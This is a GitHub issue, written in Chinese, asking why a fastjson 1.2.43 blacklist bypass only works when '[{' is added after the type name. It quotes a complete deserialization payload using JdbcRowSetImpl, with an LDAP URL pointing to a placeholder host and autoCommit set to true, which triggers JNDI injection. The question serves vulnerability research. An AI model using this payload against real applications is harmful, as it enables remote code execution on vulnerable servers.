Skip to content

请问关于fastjson1.2.43版本下的绕过payload有没有深度解析? #2

@Bertram-demo

Description

@Bertram-demo

在1.2.43版本下,使用了如下的payload绕过:
{
"@type":"[com.sun.rowset.JdbcRowSetImpl"[{
"dataSourceName":"ldap://xxx",
"autoCommit":true
}
只有添加"[{"才不会报错并且触发漏洞,请问是否了解具体原因,我看好多篇解析都没说到这个问题,不知道是不是我的查找方向错了

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions